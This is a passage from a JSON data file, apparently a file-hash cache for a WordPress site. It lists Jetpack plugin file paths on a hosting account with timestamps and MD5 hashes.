s\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/templates\\/rectangular-layout.php\":{\"d\":1544704145,\"h\":\"c5836abbe634be390d48b397172c6017\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/templates\\/circle-layout.php\":{\"d\":1544704145,\"h\":\"16a50eca01fc4d7fcd23a506384952ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/tiled-gallery-item.php\":{\"d\":1544704145,\"h\":\"b374c3e55e85824fdde1c6dc4a7e2361\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/tiled-gallery-circle.php\":{\"d\":1544704145,\"h\":\"a3d16eb79c72d2c9ace143b7d7512831\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/tiled-gallery.css\":{\"d\":1544704145,\"h\":\"2b1530d1ac8433796ae3723c95a1fe3e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/tiled-gallery-square.php\":{\"d\":1544704145,\"h\":\"3d89b7ebd258bcc0f8e4da94d2224c44\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/tiled-gallery-rtl.css\":{\"d\":1544704145,\"h\":\"224db88b1664d277b56d8336578a29d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/tiled-gallery-layout.php\":{\"d\":1544704145,\"h\":\"8befa687d3d4c03fa4f618f08b98a87e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/tiled-gallery-rectangular.php\":{\"d\":1544704145,\"h\":\"0082d89c4e5937f61f5021cbff66bc5f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/tiled-gallery.js\":{\"d\":1544704145,\"h\":\"544ff83ed87d71d7db1bed2f33c9e77c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery\\/tiled-gallery-shape.php\":{\"d\":1544704145,\"h\":\"c801c88a6f292df3509dfc29a0cab09d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/math\\/class-constrained-array-rounding.php\":{\"d\":1544704145,\"h\":\"702b1c0ec623f6f8b851534e9ea13c43\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/tiled-gallery\\/tiled-gallery.php\":{\"d\":1544704145,\"h\":\"76e03a0553f4e96e39986e312203d332\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/search\\/class.jetpack-search-template-tags.php\":{\"d\":1544704145,\"h\":\"a922983218b96edd42cd5c08a6f03543\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/search\\/class.jetpack-search-helpers.php\":{\"d\":1544704145,\"h\":\"125b0873d997bb24ab8ac55df956ccc0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/search\\/class.jetpack-search.php\":{\"d\":1544704145,\"h\":\"176a1a4dc1a09bc9c68eb0a40059f0ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/masterbar\\/overrides.css\":{\"d\":1544704145,\"h\":\"145373178f6350b152520ddb2dc35311\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/masterbar\\/rtl-admin-bar.php\":{\"d\":1544704145,\"h\":\"6f5c307646925fcd2de16fd5737339d0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/masterbar\\/tracks-events.js\":{\"d\":1544704145,\"h\":\"841867eea675f7bd80a6dff87611b5c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/masterbar\\/masterbar.php\":{\"d\":1544704145,\"h\":\"3083ca6a6be00c89ca021062c1af3c64\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/likes\\/queuehandler.js\":{\"d\":1544704145,\"h\":\"86829ec24cf6c31844aa016dec81a295\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/likes\\/post-count-jetpack.js\":{\"d\":1544704145,\"h\":\"493f3be859ce102ab7cd2952525459e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/likes\\/jetpack-likes-master-iframe.php\":{\"d\":1544704145,\"h\":\"99293ee9604b2a849a162f89dd178fd3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/likes\\/style.css\":{\"d\":1544704145,\"h\":\"df3b417607a956ca346042fc976951a1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/likes\\/jetpack-likes-settings.php\":{\"d\":1544704145,\"h\":\"6eecea9e25b0776ac86ce21c4ad45520\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/likes\\/post-count.js\":{\"d\":1544704145,\"h\":\"49151a1c52319c9092c105b33b4ed4bc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/pwa\\/class.jetpack-pwa-helpers.php\":{\"d\":1544704145,\"h\":\"67163b226ffa509425c703bb7a941324\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/pwa\\/class.jetpack-pwa-manifest.php\":{\"d\":1544704145,\"h\":\"f6347c0e2e8477176c5d470564b45a73\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/calypsoify\\/mods-gutenberg.js\":{\"d\":1544704145,\"h\":\"ddd092fd607498eb86f7c7d18a56b5fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/calypsoify\\/README.md\":{\"d\":1544704145,\"h\":\"e3681bbc0b91c1db1d777ce2705f223e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/calypsoify\\/mods.js\":{\"d\":1544704145,\"h\":\"8e02504405bc51d47c330856034ea1f7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/calypsoify\\/style-gutenberg.min.css\":{\"d\":1544704145,\"h\":\"0a03004cdfa762b5c00439fc1775d1fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/calypsoify\\/style-gutenberg-rtl.min.css\":{\"d\":1544704145,\"h\":\"e3cadfe2767ca337c8a272e7bbfe3210\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/calypsoify\\/style-rtl.min.css\":{\"d\":1544704145,\"h\":\"0a8127a1a5cdeeece0397a93bb25bbfe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/calypsoify\\/class.jetpack-calypsoify.php\":{\"d\":1544704145,\"h\":\"bc2f96260c0d01b85f3a919692c5d356\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/calypsoify\\/style.min.css\":{\"d\":1544704145,\"h\":\"15bd544d651c6cab84c102a70cdc71ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/photon-cdn\\/jetpack-manifest.php\":{\"d\":1544704145,\"h\":\"25688dd531720ff56d5c970d90a0ee59\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/simple-payments\\/paypal-express-checkout.js\":{\"d\":1544704145,\"h\":\"4ebe3763bf50329b8652c665fd5504ea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/simple-payments\\/simple-payments.css\":{\"d\":1544704145,\"h\":\"f6c28fd64e6b63614f6258ff2b4c53be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/simple-payments\\/simple-payments.php\":{\"d\":1544704145,\"h\":\"f406ed97b65a968f5d3db40acbc482c1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/protect\\/shared-functions.php\":{\"d\":1544704145,\"h\":\"d87615292a0494f4cc9f089234b79739\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/protect\\/blocked-login-page.php\":{\"d\":1544704145,\"h\":\"f99c776784a249bcc334a5606f4dafbb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/protect\\/protect-dashboard-widget-rtl.min.css\":{\"d\":1544704145,\"h\":\"f426806601f58a7604e557b03a4f8cf9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/protect\\/protect-dashboard-widget.css\":{\"d\":1544704145,\"h\":\"0ebf7f7a0e02fdfda10e9b71ca221223\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/protect\\/protect-dashboard-widget-rtl.css\":{\"d\":1544704145,\"h\":\"64622e75679377083c63bafbd45ae16e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/protect\\/math-fallback.php\":{\"d\":1544704145,\"h\":\"0c929914d730a6c3a969f04118e2f43d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/protect\\/protect-dashboard-widget.min.css\":{\"d\":1544704145,\"h\":\"1ec349fc71089d3400fcbe80fa855494\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/protect\\/transient-cleanup.php\":{\"d\":1544704145,\"h\":\"5a0f71e7bf5b599de8c60399896e3f38\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/protect\\/config-ui.php\":{\"d\":1544704145,\"h\":\"36263570297786d0d2b4f3d3ed056105\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/google-analytics\\/classes\\/wp-google-analytics-utils.php\":{\"d\":1544704145,\"h\":\"6680c0f2b2d7186dd6fa083d94464e54\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/google-analytics\\/classes\\/wp-google-analytics-legacy.php\":{\"d\":1544704145,\"h\":\"e4f5ec34827caea7966d539244bcff34\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/google-analytics\\/classes\\/wp-google-analytics-universal.php\":{\"d\":1544704145,\"h\":\"19f3a9334c32e4c30a36d061df45e1f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/google-analytics\\/classes\\/wp-google-analytics-options.php\":{\"d\":1544704145,\"h\":\"46d75437b00a53963335e5d576807857\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/google-analytics\\/wp-google-analytics.php\":{\"d\":1544704145,\"h\":\"b57aad6eca9475abfca6cf7a4be75bd7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/geo-location\\/class.jetpack-geo-location.php\":{\"d\":1544704145,\"h\":\"c2ee69f215926678c2acb70321a5a2d0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/css\\/slideshow-shortcode-rtl.min.css\":{\"d\":1544704145,\"h\":\"cb5da8ac230eb0dad7e207b321bbcd2d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/css\\/recipes-print.min.css\":{\"d\":1544704145,\"h\":\"8029eac4936e1ecd1e33582258c7cc93\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/css\\/recipes-print-rtl.min.css\":{\"d\":1544704145,\"h\":\"8416341826fd2d6cbd35e233628a8a4a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/css\\/quiz.css\":{\"d\":1544704145,\"h\":\"c764d13b229fad339a5dcc08acb854c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/css\\/slideshow-shortcode-rtl.css\":{\"d\":1544704145,\"h\":\"d5f2f88ac0bb2fd41cc7e56c17676707\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/css\\/slideshow-shortcode.min.css\":{\"d\":1544704145,\"h\":\"9afe7b2a8942eb99e1ceb1ae7518bbc7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/css\\/recipes-print-rtl.css\":{\"d\":1544704145,\"h\":\"8416341826fd2d6cbd35e233628a8a4a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/css\\/recipes-rtl.css\":{\"d\":1544704145,\"h\":\"684c843a844229a6bda91419748154ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/css\\/style.css\":{\"d\":1544704145,\"h\":\"bcd60330f5b20579092a9eb18a9aea2c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/css\\/recipes.min.css\":{\"d\":1544704145,\"h\":\"3f9d36c95864c9439460217eafcc70a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/css\\/recipes-print.css\":{\"d\":1544704145,\"h\":\"86cbd83c4db9bc919bcd590985adf0e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/css\\/recipes.css\":{\"d\":1544704145,\"h\":\"cc662832f0cf2478436722943361c5df\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/css\\/slideshow-shortcode.css\":{\"d\":1544704145,\"h\":\"31b3f6c727e57df2068867598ab32d45\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/css\\/recipes-rtl.min.css\":{\"d\":1544704145,\"h\":\"684c843a844229a6bda91419748154ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/js\\/recipes-printthis.js\":{\"d\":1544704145,\"h\":\"888d74beac6f2661574b09ee967f10e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/js\\/jquery.cycle.min.js\":{\"d\":1544704145,\"h\":\"c17c34b6395de9e1a467bda34c824900\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/js\\/gist.js\":{\"d\":1544704145,\"h\":\"bcfc86ca711efc8efb04454ec81f0044\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/js\\/recipes.js\":{\"d\":1544704145,\"h\":\"d93d77dcfb532d5fc913b9705dc766db\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/js\\/slideshow-shortcode.js\":{\"d\":1544704145,\"h\":\"b4e12285a4ab8ed0d8e472f4b6781237\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/js\\/quiz.js\":{\"d\":1544704145,\"h\":\"e65334dd98be0c147b79fc02a9c1a265\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/js\\/instagram.js\":{\"d\":1544704145,\"h\":\"b6c29f6f9aca2ac05d443d4b46700a84\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/js\\/jmpress.js\":{\"d\":1544704145,\"h\":\"a02d78c68ddf0a563878b4803346fd4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/js\\/main.js\":{\"d\":1544704145,\"h\":\"c62be49eb9eb87b64eda223a516a94f8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/js\\/brightcove.js\":{\"d\":1544704145,\"h\":\"c693fe63734b85d63f0f751565ff8fa2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/instagram.php\":{\"d\":1544704145,\"h\":\"38b2005f1163fda751fe86a1ce5f28e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/bandcamp.php\":{\"d\":1544704145,\"h\":\"38dddfb7549f375c553794dad82285c4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/gist.php\":{\"d\":1544704145,\"h\":\"2cebd4b1410f71f38c265334777a8a42\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/ustream.php\":{\"d\":1544704145,\"h\":\"8393a57581db8d125314315959852b2d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/videopress.php\":{\"d\":1544704145,\"h\":\"1e810c217dfb3f2bfc1927fdcd090d5d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/recipe.php\":{\"d\":1544704145,\"h\":\"740b24355d94437674f97304c96eeb22\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/flickr.php\":{\"d\":1544704145,\"h\":\"a254fd9569fb1cf28763049ce7aaef9a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/vine.php\":{\"d\":1544704145,\"h\":\"ef96e54cf5235507dc7cba104a355dc6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/youtube.php\":{\"d\":1544704145,\"h\":\"cab478dbecf631834b6f85dedb7964fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/medium.php\":{\"d\":1544704145,\"h\":\"81fc4c15bca8f761a9542b1a370d8f3c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/slideshare.php\":{\"d\":1544704145,\"h\":\"7a828724a383b0adfea9da5464c1a913\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/facebook.php\":{\"d\":1544704145,\"h\":\"5fb648f1ba0f94333c0a8b20fba4b405\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/twitter-timeline.php\":{\"d\":1544704145,\"h\":\"211914a228163c1e09272dc9ef29a79f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/codepen.php\":{\"d\":1544704145,\"h\":\"cfe97b960b3ff1c4e8d86f336239af88\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/scribd.php\":{\"d\":1544704145,\"h\":\"c6db0f03071b77c9a49100b38ffdbfe4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/archiveorg.php\":{\"d\":1544704145,\"h\":\"fcae11266720eb59ea2bf74651e0cd4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/mailchimp.php\":{\"d\":1544704145,\"h\":\"9ae54fc7a77aa388888f0c350c7388fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/houzz.php\":{\"d\":1544704145,\"h\":\"9767a35aadc3b59ab28da222915a2008\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/flatio.php\":{\"d\":1544704145,\"h\":\"0e24fe66477516fa23ad1a322dcc155b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/class.filter-embedded-html-objects.php\":{\"d\":1544704145,\"h\":\"bf22b7670701d5cbf562855d9ec4f3d5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/wufoo.php\":{\"d\":1544704145,\"h\":\"504661edf28b3d4a41176a5d5592cac3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/spotify.php\":{\"d\":1544704145,\"h\":\"7f83a1fb6cd842943ee885a412dce407\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/untappd-menu.php\":{\"d\":1544704145,\"h\":\"797fbc57adfbb9d555b0abbe7aa48cdc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/dailymotion.php\":{\"d\":1544704145,\"h\":\"c0d37f61ec36ec78ea534b51555847b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/tweet.php\":{\"d\":1544704145,\"h\":\"2c06711632c913e2b88fc075d950e576\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/soundcloud.php\":{\"d\":1544704145,\"h\":\"3feefa41d9609c60a92bf3afb20ddd41\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/crowdsignal.php\":{\"d\":1544704145,\"h\":\"b9e1de11d67d280bcb77dcd522fe5cd8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/polldaddy.php\":{\"d\":1544704145,\"h\":\"eaeed250d79f95fdfcda1abf7c71c0e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/mixcloud.php\":{\"d\":1544704145,\"h\":\"467b986a07c388185e3b7eefa2be65ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/quiz.php\":{\"d\":1544704145,\"h\":\"e48174d9fae65864e4a1760ecb9ee84d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/upcoming-events.php\":{\"d\":1544704145,\"h\":\"de0f3b6983feb23399c859a0809295c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/slideshow.php\":{\"d\":1544704145,\"h\":\"a1f07bff086b7e1acabc980262eca0d5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/diggthis.php\":{\"d\":1544704145,\"h\":\"ed331729bb3af26cc6973925441ec022\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/googleapps.php\":{\"d\":1544704145,\"h\":\"f58a69aedb8ae9ba9fbd07bb32ad289b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/unavailable.php\":{\"d\":1544704145,\"h\":\"1378b1ee33bf092bc5fca75f8374bddb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/kickstarter.php\":{\"d\":1544704145,\"h\":\"dffe16e7cecf12e04393c68c77943df6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/archives.php\":{\"d\":1544704145,\"h\":\"3aeeca139944c6201e8cb501fe1fa0d5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/audio.php\":{\"d\":1544704145,\"h\":\"8e4010b5bea79fce1cf9b57d822ef350\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/wordads.php\":{\"d\":1544704145,\"h\":\"1a799ae2d988dfc59759ae029e198f9f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/hulu.php\":{\"d\":1544704145,\"h\":\"8682153ad04a45878229a7121a63fc8c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/vr.php\":{\"d\":1544704145,\"h\":\"0a5f13edf287afe2a650893aa2437bb9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/getty.php\":{\"d\":1544704145,\"h\":\"b321a80d5b30da22a4532f71d65d318c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/gravatar.php\":{\"d\":1544704145,\"h\":\"2b802d3e322121a2b16cd9a2436af2d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/brightcove.php\":{\"d\":1544704145,\"h\":\"4e3ee16bfcd2b80a0c019690860d49d0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/googlemaps.php\":{\"d\":1544704145,\"h\":\"a0368aa539261d4b717dad9a5d7eb106\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\\/vimeo.php\":{\"d\":1544704145,\"h\":\"0482ea7c7519284ff5df9d454ebb611d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/shortcodes\